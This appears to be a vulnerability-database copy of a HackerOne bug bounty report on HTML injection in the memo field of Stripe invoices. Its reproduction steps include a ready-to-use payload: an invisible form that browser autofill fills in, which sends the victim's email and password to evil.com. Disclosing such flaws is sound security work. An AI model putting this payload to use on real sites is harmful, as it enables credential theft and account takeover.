Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneSn-shykH1:1257767
HistoryJul 12, 2021 - 2:58 a.m.

Stripe: HTML Injection in the Invoice memos field

2021-07-1202:58:59
sn-shyk
hackerone.com
$500
22
html injection
takeover
auto-save
security vulnerability
JSON

Summary:

In customer invoices a memo field is vulnerable to HTML injection. So i can takeover any victim’s account with auto-save functionality through HTML injection. Basically when we saved the login credential in our browser & tried to login into the account the browser automatically fills the email & pass we just need to click on login. so I created a login form and make the email & password field invisible by setting Opacaity:0 in CSS and set my button name to “Load more content”.

Steps To Reproduce:

  1. Login to your account and save your email and password in your browser

  2. Go to https://dashboard.stripe.com/invoices. Create new invoice or edit any invoice

  3. Memo field is vulnerable to HTML injection. So just paid this HTML code to memo field “<form action=”//evil.com" method=“GET”><input type=“text” name=“u” style=‘opacity:0;’><input type=“password” name=“p” style=‘opacity:0;’><input type=“submit” name=“s” value=“Load more content”> "

  4. Save the invoice. Now open that invoice in a new tab.

  5. You can see a “load more content” button there. Just click on that button and in evil.com you will find your email and password in URL.

  6. You can takeover any victim’s account by sending that invoice

Supporting Material/References:

https://saadahmedx.medium.com/exploiting-auto-save-functionality-to-steal-login-credentials-bf4c7e1594da

Impact

Takeover any victim’s account

JSON